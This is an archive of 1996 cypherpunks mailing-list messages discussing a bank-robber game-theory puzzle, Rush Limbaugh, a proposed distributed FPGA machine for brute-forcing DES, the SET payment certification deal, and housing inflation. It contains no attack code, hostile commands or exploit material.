> > >>how they plan to split the money: they stay in line, and the first guy
> > >>suggests how to split the money. Then they vote on his suggestion.
>                                           ^^^^         ^^^
> > No. Robber 18 knows that he will be killed under those circumstances, so he
> > proposes that Robber 20 gets all the money. 20 votes with him. 
> 
> I think many are assuming that the cypherpunk making the suggestion
> gets a vote.  My reading of the puzzle is that he does not.
> 

Everyone who is still alive, including the one making a suggestion, can
vote.


	- Igor.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brendon Macaraeg <bqm1808@is.nyu.edu>
Date: Sat, 27 Jul 1996 02:37:06 +0800
To: cypherpunks@toad.com
Subject: "privatizing" phones?
Message-ID: <1.5.4.32.19960726085331.0067db88@is.nyu.edu>
MIME-Version: 1.0
Content-Type: text/plain


Cpunks:

While shopping for a new phone recently, I came across
two models (Toshiba and Uniden I believe) that
have buttons to "privatize" you conversations. These
were on no-cord models. Does anyone have any idea
on what these actually do? Can the phones  change
 the frequency the call is on randomly
so people can't tune into it? I know cellulars offer something
similar. Personally, I would never put much faith into
something of this sort. 

-B
========================================
Brendon Macaraeg
http://www.itp.tsoa.nyu.edu/~brendonm
Finger macaragb@acf2.nyu.edu for PGP Public Key





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ichudov@algebra.com (Igor Chudov @ home)
Date: Sat, 27 Jul 1996 01:03:18 +0800
To: david@sternlight.com (David Sternlight)
Subject: Re: Twenty Bank Robbers -- Game theory:)
In-Reply-To: <v03007801ae1e1cb77f7f@[192.187.162.15]>
Message-ID: <199607261353.IAA03025@manifold.algebra.com>
MIME-Version: 1.0
Content-Type: text


David Sternlight wrote:
> 
> At 4:05 PM -0700 7/25/96, Hal wrote:
> >I think the best way to approach this problem is to first try to solve
> >it assuming there are only two robbers rather than 20.  Then once you
> >have that figured out, try it for three, then four, and so on.  Keep in
> >mind that 50% support is enough for a proposed distribution to pass, you
> >don't need a strict majority.
> >
> 
> Exactly. I arrived at the solution the same way. Note that there is another
> assumption needed--that the selection of a proposer is by lot at each new
> stage. If the ordering of proposers is known in advance, a different
> solution results.

Yes, the cypherpunk robbers are ordered by alphabet.

igor




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Clay Olbon II" <Clay.Olbon@dynetics.com>
Date: Sat, 27 Jul 1996 00:01:15 +0800
To: "snow" <snow@smoke.suba.com>
Subject: Rush on crypto
Message-ID: <AE1E3918-4C0918@193.239.225.200>
MIME-Version: 1.0
Content-Type: text/plain


snow <snow@smoke.suba.com> wrote:

>     OB Crypto: From what I have heard Mr. Limbaugh _didn't_ like the CDA,
>and if the right person can get to him and convince him properly, he might
>even come out against GAK (if he hasn't already). He has the potential to 
>reach millions of _very_ loyal people. It might be worth someones time to 
>try to get thru to him.

When Clinton testified in the recent whitewater trial via videotape, it was
reported in the press that the testimony was sent to Arkansas via an
encrypted data link.  Rush commented that it was only a matter of time
before some smart teenager figured out how to decrypt it.  I sent him a
brief email discussing crypto (PGP, etc.) and gave him some links,
explaining why it was not likely that a teenager could decrypt the
transmission.  I never received a reply (didn't expect to however, I am
sure he is inundated with email).  He uses a computer and mentions it often
on his radio show - I think Chris is right, if we could somehow get him to
understand the technology, he would probably be on our side against GAK.

As a libertarian, I find that I agree with Rush on a great many issues
(many more than I have in common with the liberals).  Most of the people
who speak badly of him have never listened to him for any length of time. 
Sound bites taken out of context are wonderful for mischaracterization.  

	Clay


***************************************************************************
Clay Olbon II       *      Clay.Olbon@dynetics.com
Systems Engineer    *    PGP262 public key on web page
Dynetics, Inc.      * http://www.msen.com/~olbon/olbon.html
***************************************************************** TANSTAAFL





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Sat, 27 Jul 1996 03:09:26 +0800
To: cypherpunks@toad.com
Subject: Re: Produce 7 Hertz Frequency
Message-ID: <199607261558.IAA11068@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 04:48 PM 7/26/96 -0700, Timothy C. May wrote:
>At 4:56 AM 7/26/96, Mike Duvos wrote:
>
>
>>I'm not sure what this gentleman's application is.  If I wanted
>>a 7 hz signal, I would take my handy dandy programmable digital
>>signal generator, press the "sin" button, and punch in "7" on
>>the numeric keypad.
>>
>>Am I missing something here?
>
>What does "sin" have to do with the number 7? Oh, you must mean the movie
>"Se7en," in which the Se7en deadly sins were central to the plot. I get it.
>The seven deadly sins are the seven deadly hurts.
>
>(Cos I know about sin.)
>
>Ironic that the original message was from Jerome Tan, eh? Someone must've
>trigged this whole thread. I fear we're going in circles.
>
>"Kenneth, what is the frequency?"
>
>--Dan Rather

Secant ye shall find!  
Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Fri, 26 Jul 1996 10:15:03 +0800
To: cypherpunks@toad.com
Subject: RE: Schelling Points, Rights, and Game Theory--Part II
Message-ID: <ae1d4dd915021004d9c5@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 11:51 PM 7/25/96, jbugden@smtplink.alis.ca wrote:

>The stats on the average internet user are usually something like 85% male,
>US$50K average income, 30-35 years old, Univeristy education.

I doubt the age figure, and would want to see confirmation before using it.
Certainly most people I deal with on the Net seem to be younger than 30-35,
though this may be a reasonable _average_ (if not _median_). But the rest
of the stats fit.

>It may come as no suprise then that Internet users as a group could have life
>experiences significantly different than a majority of the population.
>Similarily, their views may also be in the minority. On the other hand, they do
>hold a majority of the technological power.
>
>Revenge of the Nerds is one phrase that I have heard.

An old movie name, of course. And "Triumph of the Nerds" was the name of
the recent PBS/Mark Stevens program. (I hate the term "nerd," as I hate the
names "dweeb," "geek," "jerk," etc. Believe me, anyone who thinks being
called a "nerd" is complimentary, or anyone who labels himself as a "geek,"
is probably one who would call himself a "nigger," or a "queer.")

>tcmay@got.net wrote:
>>Even meant humorously (">;-)"), many of us would dispute the notion that >a
>voluntarily-taken job is a "McJob." Frankly, working at a fast-food place
>>is usually not a lifetime career, but is instead a [stepping stone]
>
>And what or who guarantees that this later, better job exists. Much of what I
>read today suggests that McJobs may become the norm for many.

"Guarantees"? You ask "what or who guarantees" a better job? I am speechless.

There are no guarantees, friend. Not in this reality. Jobs are not
something created by the stroke of a Presidential pen--jobs are what we
call the exchange of labor or brainpower for money or other considerations.
If Alice wants a new roof, and Bob offers to roof her house for a price she
think is reasonable, this is a "job" for Bob. And so on.

>Can you image working at a low paying job for your entire life. I personally
>can't. I work hard and am doing well for myself. Like most of those here,
>crypto
>would be a benefit for me. On the other hand, unlike most of the population, I
>could join Mensa if I applied. My point: I'm not average and I suspect that
>neither are you or most of those here. How do you make the cypherpunks agenda
>(on the days that there is one ;-) of widespread concern to the average
>citizen?

I don't, actually. As to "working at a low paying job...", it's a matter
for them to work out, perhaps by getting new skills, perhaps by working two
jobs, perhaps by opening a business. The statistics on where wealth was
created in the 1985-95 period show it overwhelmingly came from new
entrepreneurial efforts.



>I'm having a hell of a time getting my e-mail read because I'm too busy
>shooting
>at the food scavengers. They killed my dog!
>

????

Not a persuasive argument.

--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeremey Barrett <jeremey@forequest.com>
Date: Sat, 27 Jul 1996 03:42:43 +0800
To: Igor Chudov <ichudov@algebra.com>
Subject: Re: Twenty Bank Robbers -- CLARIFICATION
In-Reply-To: <199607251813.NAA02650@galaxy.galstar.com>
Message-ID: <Pine.BSI.3.93.960726091853.5736A-100000@descartes.forequest.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Does the proposer have a vote? I assumed he did.

On Thu, 25 Jul 1996, Igor Chudov wrote:

> Igor Chudov wrote:
> > 
> > Here's a puzzle for our game theorists.
> > 
> > Twenty cypherpunks robbed a bank. They took 20 million bucks. Here's
> > how they plan to split the money: they stay in line, and the first guy
> > suggests how to split the money. Then they vote on his suggestion. If
> > 50% or more vote for his proposal, his suggestion is adopted.
> > 
> > Otherwise they kill the  first robber and now it is the turn of guy #2
> > to make another splitting proposal. Same voting rules apply.
> > 
> > The question is, what will be the outcome? How will they split the
> > money, how many robbers will be dead, and so on?
> > 
> 
> I forgot to say what the GOALS are. The goals of every individual
> cypherpunk are (in from highest to lowest priority): 
> 
> 1. Stay alive
> 2. Get as much money as possible
> 3. Keep as many cypherpunks alive as possible, all other things being equal.
> 
> 	- Igor.
> 

- -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Jeremey Barrett
Senior Software Engineer			jeremey@forequest.com 
The ForeQuest Company       			http://www.forequest.com/

   "less is more."
		-- Mies van de Rohe.

   Ken Thompson has an automobile which he helped design.  Unlike most
   automobiles, it has neither speedometer, nor gas gage, nor any of the
   numerous idiot lights which plague the modern driver.  Rather, if the
   driver makes any mistake, a giant "?" lights up in the center of the
   dashboard.  "The experienced driver", he says, "will usually know
   what's wrong."

		-- 'fortune` output

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMfjwES/fy+vkqMxNAQFKqAP/WAsGcyj68bzCWPBPv2olelyb/cdr9fZF
yaDxGwHSMz/wCNFD9OOpjrNhhANFPBoFpI7fyhXLMsiazmQD/8t5wdywS7ILyWJl
jw+BnFHuU5aT8y+1KfADLtLrX3R2EHpEh5Rn3T7ZK7bBHdolML52JJfHFZEyaU1f
2yTVG+KbLWw=
=sjJf
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Peter Trei" <trei@process.com>
Date: Fri, 26 Jul 1996 23:53:36 +0800
To: cypherpunks@toad.com
Subject: Re: Produce 7 Hertz Frequency
Message-ID: <199607261309.GAA27282@toad.com>
MIME-Version: 1.0
Content-Type: text/plain



> From: Jerome Tan <jti@i-manila.com.ph>

> Does anyone know how to produce a 7 hertz frequency?

Jerome has so far asked us, among other things:

What does 'reverse engineering' mean in a hacking context?
Does anyone know how to make a home-made telephone voice changer?
Is it possible to penetrate a firewall?
How can I crack unix password files?
Is there a way I can run Unix under Win95?

I think this man needs to read alt.2600, not cypherpunks.

I wonder if this is the same Jerome Tan who was at Nanyang
Technological University in Singapore?

I wonder what the folks at St Luke's Medical Center in Manilla think of
this stuff?

Peter Trei
ptrei@acm.org




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Fri, 26 Jul 1996 11:55:09 +0800
To: cypherpunks@toad.com
Subject: Limbaugh and "Soul Train"
Message-ID: <ae1d5486160210046b36@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 8:20 PM 7/25/96, Paul S. Penrod wrote:
>On Wed, 24 Jul 1996 hallam@Etna.ai.mit.edu wrote:

>> And why did the networks put Rush on so late? Could it be that
>> he did not pull in the viewers?
>
>Syndicated shows are scheduled by the local broadcasters. They decide
>when and if to run them. It only makes sense that if you have control
>over your material but are at the mercy of the broadcaster, that is not a
>sound business position to remain in.

As an interesting point of comparison, the program "Soul Train," featuring
predominantly black music, has been in syndication for more than 25 years.
And it usually aired late at night.

(I learned this by watching a "Best of 'Soul Train'" program on VH1. The
show's creator and director pointed out that being on at 11 p.m. or 1 a.m.
made it tough for many of the show's fans to watch it.)

My point? Controversial material is often shoved to the end of a
programming schedule. This makes room for the "Wheel of Fortune" and
"Adam-12" shows in prime time.

I'm obviously not arguing for regulatory intervention in scheduling, for
either Limbaugh or "Soul Train," merely noting that shows with
strong-but-limited appeal often find themselves playing second fiddle to
"The Dating Game."

Yes, I think Limbaugh has "limited" appeal. I watched him a few times.
Sometimes funny, often controversial. But mostly for "dittoheads."

--Tim May


Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Lesher <wb8foz@nrk.com>
Date: Sat, 27 Jul 1996 00:50:29 +0800
To: stewarts@ix.netcom.com (Bill Stewart)
Subject: Re: Twenty Bank Robbers -- Game theory:)
In-Reply-To: <199607260854.BAA24001@toad.com>
Message-ID: <199607261346.JAA19696@nrk.com>
MIME-Version: 1.0
Content-Type: text


> 
> >``Twenty cypherpunks robbed a bank.''
> >        ^^^^^^^^^^^^^
> >I was careful choosing words.
> 
> That was my reaction as well.  I'd assume that if twenty cypherpunks
> rob a bank, either it's one of Eric's party games (:-), or else 
> they probably conspired over the net to rob a bank by computer.


Will they ALL fit in Tim May's hot tub?

-- 
A host is a host from coast to coast.................wb8foz@nrk.com
& no one will talk to a host that's close........[v].(301) 56-LINUX
Unless the host (that isn't close).........................pob 1433
is busy, hung or dead....................................20915-1433




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Fri, 26 Jul 1996 19:03:10 +0800
To: Cypherpunks@toad.com
Subject: No Subject
Message-ID: <199607260758.JAA18523@basement.replay.com>
MIME-Version: 1.0
Content-Type: text/plain


On 7/25/96, Louis Freeh said:

-  - In the Aldrich Ames spy case, where Ames was told by his Soviet       
-  handlers to encrypt computer file information to them.
-  
-  - In a child pornography case, where one of the subjects used
-  encryption in transmitting obscene and pornographic images of children
-  over the Internet.                                                    
-
-  - In a major drug-trafficking case, where one of the subjects of one
-  of the court-ordered wiretaps used a telephone encryption device which
-  frustrated the surveillance.                                         
-
-  - Some of the anti-Government Militia groups are now advocating the   
-  use of encryption as a means of preventing law enforcement from              
-  properly investigating them.                                          

Thats 4 count em FOUR horsemen.



Have a nice day.








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Clay Olbon II" <Clay.Olbon@dynetics.com>
Date: Sat, 27 Jul 1996 00:55:19 +0800
To: "jim bell" <cypherpunks@toad.com>
Subject: Re: Twenty Bank Robbers -- Game theory:)
Message-ID: <AE1E48FA-4FC47D@193.239.225.200>
MIME-Version: 1.0
Content-Type: text/plain


jim bell <jimbell@pacifier.com> wrote:
>My previous answer was incomplete, of course.  I continue to believe that 
>the problem is unsolveable as stated, if for no other reason than the 
>"weight" of the negative represented by dying is not stated.  It's a VERY 
>complex problem, unless there's some trick I'm not seeing.

Jim is right.  The problem with any optimization problem is when
unquantifiable negatives are included.  The "classic" example of this is an
inventory problem.  The optimal solution is minimal (or no) inventory,
however there are unquantifiable negatives that arise when a customer
cannot get his product when he wants it.  I don't think the problem is that
complex if the negative is that you get no money rather than "you die".  As
an aside, many game theory problems (possible including the simplified
version of this one) are solvable using linear programming (and no, that is
not writing C one line at a time ;-).  It has been far too long since my
last game theory course to consider trying to set this problem up however
(I've found that I don't use either game theory or LP a whole lot in the
"real world" of engineering).  

	Clay


***************************************************************************
Clay Olbon II       *      Clay.Olbon@dynetics.com
Systems Engineer    *    PGP262 public key on web page
Dynetics, Inc.      * http://www.msen.com/~olbon/olbon.html
***************************************************************** TANSTAAFL





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: snow <snow@smoke.suba.com>
Date: Sat, 27 Jul 1996 02:52:25 +0800
To: Jerome Tan <jti@i-manila.com.ph>
Subject: Re: Produce 7 Hertz Frequency
In-Reply-To: <01BB7ABB.F7A9E440@Jerome Tan>
Message-ID: <Pine.LNX.3.93.960726100506.1076D-100000@smoke.suba.com>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 25 Jul 1996, Jerome Tan wrote:

> Does anyone know how to produce a 7 hertz frequency?


     Why? Wanna kill some chickens? 

Petro, Christopher C.
petro@suba.com <prefered for any non-list stuff>
snow@smoke.suba.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: snow <snow@smoke.suba.com>
Date: Sat, 27 Jul 1996 02:45:10 +0800
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: Limbaugh and "Soul Train"
In-Reply-To: <ae1d5486160210046b36@[205.199.118.202]>
Message-ID: <Pine.LNX.3.93.960726101044.1076F-100000@smoke.suba.com>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 26 Jul 1996, Timothy C. May wrote:
> At 8:20 PM 7/25/96, Paul S. Penrod wrote:
> >On Wed, 24 Jul 1996 hallam@Etna.ai.mit.edu wrote:
> (I learned this by watching a "Best of 'Soul Train'" program on VH1. The
> show's creator and director pointed out that being on at 11 p.m. or 1 a.m.
> made it tough for many of the show's fans to watch it.)

     Judging by my neighborhood, I would doubt that.


Petro, Christopher C.
petro@suba.com <prefered for any non-list stuff>
snow@smoke.suba.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: snow <snow@smoke.suba.com>
Date: Sat, 27 Jul 1996 03:57:12 +0800
To: "Igor Chudov @ home" <ichudov@algebra.com>
Subject: Re: CD Prices and Inflation
In-Reply-To: <199607260310.WAA13233@manifold.algebra.com>
Message-ID: <Pine.LNX.3.93.960726101819.1076G-100000@smoke.suba.com>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 25 Jul 1996, Igor Chudov @ home wrote:

> buy classical CDs, they are dirt cheap and fun to listen to.
> if you do not like classics, it most likely means that you
> just have not found your favorite composer yet.

     I just can't get into the lyrics.


    

Petro, Christopher C.
petro@suba.com <prefered for any non-list stuff>
snow@smoke.suba.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: snow <snow@smoke.suba.com>
Date: Sat, 27 Jul 1996 03:46:52 +0800
To: hallam@Etna.ai.mit.edu
Subject: Re: LIMBAUGH ON TV
In-Reply-To: <9607260125.AA08079@Etna.ai.mit.edu>
Message-ID: <Pine.LNX.3.93.960726101937.1076I-100000@smoke.suba.com>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 25 Jul 1996 hallam@Etna.ai.mit.edu wrote:
> decision. He would still be way smarter than Rush either way and 
> Marvin Minsky would be smarter than both. Only guy I have ever met
> who was super rich who impressed me as an intellectual force was 
                                                         ^^^^^

> Bill Gates - apart that is from friends who inherited silly amounts
> of money. 


     You mis-spelled farce. HTH. HAND.


Petro, Christopher C.
petro@suba.com <prefered for any non-list stuff>
snow@smoke.suba.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Sat, 27 Jul 1996 07:47:02 +0800
To: Remo Pini <cypherpunks@toad.com
Subject: Re: Distributed DES crack
Message-ID: <199607261723.KAA16305@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 01:28 PM 7/26/96 +0200, Remo Pini wrote:
>-----BEGIN PGP SIGNED MESSAGE-----
>
>To: cypherpunks@toad.com
>Date: Fri Jul 26 13:25:22 1996
>> At 10:30 7/23/96, Matt Blaze wrote:
>> 
>> >My estimate is that an FPGA-based machine that can do a single DES key
>> >every four months (eight months to exhaust the whole keyspace) could
>> >be built with off-the-shelf stuff for comfortably under $50k (plus
>> >labor, plus software development costs).  A prototype board should
>>  cost
>> >under $1000 and will help prove the concept and get a more accurate
>>  cost
>> >estimate.  I expect to build such a prototype machine myself, and, if
>>  it
>> >works as I expect, maybe the whole thing.
>> 
>> I am willing to financially contribute to the project.
>> 
>> 
>If this were to be a card (via RS232 or PC-bus), thousands of people would 
>be able to copy it, once the development process is finished. -> You'd have 
>hardware that all those people could use for a distributed crack, the 
>building cost would be distributed also (<$100), only development would 
>have to be at one place (sponsored of course). Now, that would be a scary 
>thought for DES-fans!

I've proposed that if it were done in this way, the circuit should be built 
external to a PC-clone or other computer, so that it can be easily tiled on 
a large pcb, in an "n by m" array.  The reason is that if an individual 
cracker module were as simple and cheap as it should be, a person could 
easily want to run dozens if not hundreds of them. Communication would 
probably be done with a single serial data bus, with each module 
individually addressed.  Due to the nature of the DES crack, communication 
would be rare, so it's likely that an ordinary '386 or '486-based computer 
could handle all the communication for a large number of such modules.

 I don't know if the figure of $10 thrown around for an FPGA is accurate, 
but if it is then a cost of $30 for each subsystem is probably doable, 
including pc board, assembly, and a few other components.   A cost of $3000 
for a 10-by-10 array seems reasonable to me, particularly since the 
throughput of each of those FPGA's ought to be at least 10x that of a 
general-purpose PC in this application. 

Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Sat, 27 Jul 1996 06:45:40 +0800
To: cypherpunks@toad.com
Subject: Re: Twenty Bank Robbers -- Game theory:)
In-Reply-To: <v03007805ae1e24c262c7@[192.187.162.15]>
Message-ID: <199607261724.KAA16957@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


Gary Howland <gary@systemics.com> writes:
>I think many are assuming that the cypherpunk making the suggestion
>gets a vote.  My reading of the puzzle is that he does not.

As we have seen apparently the intention was that he does get a vote.
However I don't think the answer changes even with Gary's interpretation.

With two people, #1 (the front of the line) must propose that all money
go to #2, otherwise #2 (who is the only one with a vote in Gary's
version) will vote against it (and get all the money when #1 dies).
With this proposal #2 will vote in favor since he gets the same amount
of money either way, and it keeps more people alive (see the post which
describes the goals of the robbers).  This is different than the
original problem, but it is the only case which differs.

With three people, #1 (in front) proposes to keep it all.  #2 will vote
in favor since if the proposal doesn't pass, #2 will end up with nothing
anyway (per above).  So #2's third goal comes into play, maximizing the
number of players alive, and he will vote in favor.  #3 may vote
against but #2's vote will be 50% (#2 and #3 get to vote in Gary's
version) and will carry.  So #1 keeps it all, the same answer as in the
original version.  Extensions to n players are again left as an exercise,
but I think the answers come out the same in Gary's version.

Hal




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Sat, 27 Jul 1996 01:04:59 +0800
To: cypherpunks@toad.com
Subject: Unix under Windows 95
Message-ID: <2.2.32.19960726142458.0084c02c@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


See:

http://www.windows95.com/apps/unix.html

For a collection of Unix software ported to Windows 95.  The PERL 5.0 works
better for me under 95 than under Unix (but I probably don't know Unix.

Unix Plea:

Could some Unix Guru out there give me (privately) a simple alias statement
or whatever that would automatically forward mail for a named user@host.com
to another email address somewhere in the world.

DCF





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Sternlight <david@sternlight.com>
Date: Sat, 27 Jul 1996 05:38:47 +0800
To: cypherpunks@toad.com
Subject: Re: Freedom, crypto, and terrorism
In-Reply-To: <2.2.32.19960725212455.006a3bf8@pop1.jmb.bah.com>
Message-ID: <v03007802ae1eaff6af2d@[192.187.162.15]>
MIME-Version: 1.0
Content-Type: text/plain


At 11:56 PM -0700 7/25/96, David Sternlight wrote:

>
>I have just revised my views on the topic of freedom, crypto, and terrorism
>as a result of reading Benjamin Netanyahu's new book (a few months old) on
>terrorism and what the West can do about it, in one sitting. The book was
>written before he became Prime Minister.

Several have asked me about this by e-mail. The title of the book is
"Fighting Terrorism--How democracies can defeat domestic and international
terrorism."

The first chapter of the book may be read free at:
http://www.washingtonpost.com/wp-srv/style/longterm/books/chap1/fighting.htm

Netanyahu's recommendations are in the final chapter of the book.

David






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Joseph M. Reagle Jr." <reagle@rpcp.mit.edu>
Date: Sat, 27 Jul 1996 02:06:15 +0800
To: cypherpunks@toad.com
Subject: MasterCard & GTE In Electronic Certification Deal 07/25/96
Message-ID: <199607261434.KAA08910@mccannerick-bh.mccann.com>
MIME-Version: 1.0
Content-Type: text/plain


What I spoke of yesterday:

  	  				 
PURCHASE, NEW YORK, U.S.A., 1996 JUL 25 (NB) -- REPEAT/By  
Ian Stokell. The race is on to provide extensive, secure electronic 
commerce over the Internet. Now MasterCard International and GTE 
Corp. (NYSE:GTE) have announced plans to deliver electronic 
certification services under the new Secure Electronic Transaction 
(SET) standard. 

The certificate authority services will be appearing by the fourth  
quarter, and will be implemented in a number of pilot programs 
worldwide, say the two companies. 

Newsbytes notes that a major obstacle to electronic commerce on  
the Internet is not the lack of suitable technologies, but public 
distrust in having to send credit card numbers electronically, with 
the perception that they can be easily intercepted en route. Industry 
experts say the public needs some sort of proven online security 
methods backed by financial and online heavyweights such as MasterCard. 

A sort of digital certificate will be developed by the two companies  
that will protect both the consumer and vendor against unauthorized 
card number use. The digital certificates will reportedly be issued 
via the Internet to cardholding consumers, Internet merchants, and 
institutions processing the transactions. 

While a number of methods for secure transactions are beginning to  
appear in the online world, notes Newsbytes, none have instantly 
jumped out in front of the pack. 

The companies say that the SET standard appeared first in June, and  
that software to allow it to be incorporated into Internet browsers, 
servers, and gateways will be available by the early fourth quarter 
from several vendors. The standard was developed by MasterCard and 
Visa in cooperation with a number of other companies, including GTE, 
IBM, Microsoft, and Netscape. 

Said Steve Mott, senior vice president, Electronic Commerce/New  
Ventures at MasterCard. "Obtaining digital signatures is expected to 
be no more difficult than signing up for an online service. We are 
also pushing to extend SET certification to chip cards to get added 
hardware/platform security and portability. We expect to extend our 
activities with GTE along these and other lines, so they are a key 
strategic ally for MasterCard and our members." 

Mott added: "We will begin testing the software by the end of the  
summer and through the remainder of this year. The missing link (to 
online commerce) was providing digital certificates to add the extra 
software authentication needed to make SET complete." 

A number of electronic commerce pilots are being planned for the fourth  
quarter. Pilots that have already been announced in which MasterCard is 
participating are in Denmark (with PBS, IBM, and Europay) and Malaysia 
(with MBf and VeriFone). 

GTE plans to offer both certification authority products and services  
under the CyberTrust brand name. CyberTrust will reportedly support all 
popular Web browsers, servers, and other public key-enabled 
applications, such as secure e-mail and electronic data interchange. 

(19960724/Press Contact: Sean Healy, MasterCard International,  
914-249-4606) 
  	   	

_______________________
Regards,            Silence is the voice of complicity. -?
Joseph  Reagle      http://rpcp.mit.edu/~reagle/home.html
reagle@mit.edu      E0 D5 B2 05 B6 12 DA 65  BE 4D E3 C1 6A 66 25 4E





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Martin Minow <minow@apple.com>
Date: Sat, 27 Jul 1996 05:48:57 +0800
To: cypherpunks@toad.com
Subject: Re: Twenty Bank Robbers -- Game theory:)
In-Reply-To: <2.2.32.19960725225533.0070ca20@mail.sd.cybernex.net>
Message-ID: <v03007802ae1eb2fed24e@[17.202.12.102]>
MIME-Version: 1.0
Content-Type: text/plain


"Peter D. Junger" <junger@pdj2-ra.F-REMOTE.CWRU.Edu> notes
> a proposal by the first guy to split the
>proceeds equally among the first ten should be satisfactory to the first
>ten.

To extend this reasoning, the first person in line announces that the first
nine (in any order) to join his "coalition" will split the $2 million.
At that point, it's a win-win (or at least win-break-even) for
the entire group.

Martin Minow
minow@apple.com






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mpd@netcom.com (Mike Duvos)
Date: Sat, 27 Jul 1996 05:24:22 +0800
To: cypherpunks@toad.com
Subject: Re: Anonymous Web Services Inc.
In-Reply-To: <199607261640.MAA03597@unix.asb.com>
Message-ID: <199607261743.KAA11989@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Someone wrote:

> > Oh joy, these guys are good publicity for our side. :^(
> > Arghh!!!
> > 
> > http://www.angelfire.com/pg1/digicrime/index.html

Isn't that Arjen Lenstra's humor page?  

--
     Mike Duvos         $    PGP 2.6 Public Key available     $
     mpd@netcom.com     $    via Finger.                      $




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brad Shantz <bshantz@nwlink.com>
Date: Sat, 27 Jul 1996 05:30:46 +0800
To: tcmay@got.net
Subject: Inflation and Housing
Message-ID: <199607261750.KAA15397@montana.nwlink.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

To: tcmay@got.net, cypherpunks@toad.com
Date: Fri Jul 26 10:53:17 1996
Tim May wrote: 
> So, what do we have now? Salaries are 2-4x higher, gold is at $375 an
> ounce, a new 3-br house averages about $100K 

As a person in the process of buying a house, I see the price of mortgages 
in a slightly different light than just inflation.  Oh, it's still 
inflation, no argument there.  I see it mainly as a problem with debt.

Back in the early sixties (which I don't remember, by the way) houses cost 
just slightly over what the average salary was...cars cost considerably 
less.  Sometime right around then, there was a boom in people 
needing/getting credit.  In fact, I'd even be willing to say it was right 
after WWII when all the GI's suddenly hit the civillian economy and were 
buying houses, and getting into college with the new-fangled GI bill.

As a result of huge people getting large amounts of credit, we have become 
a debt ridden society.  Now it takes 40% of the "husband's" monthly income 
to go toward housing cost, whereas it used to be the 25% rule.  People 
don't even blink twice now when the terms of a 30 year fixed mortgage comes 
up.   That's "just the way it's done."

Now, I also see a problem with people my age (25) wanting what took their 
parents 30 years to get in the first 3 years out of school.  (i.e. Big 
house, 2 or 3 cars, kids, dogs, cats, horses, stocks, etc.)  It is rare now 
to see people buying a "starter" home and then selling it and moving on up. 
 Why?  Well in Seattle, the starter homes are in really "NASTY" areas of 
town.  Nobody wants to live there.   So, then the starter homes in "nice" 
areas that are bought are promptly remodelled and sold as "regular" homes. 
  Uh, hello, doesn't mean that another "starter" home has been removed from 
the market.  Anyway, my point is that people here aren't buying the starter 
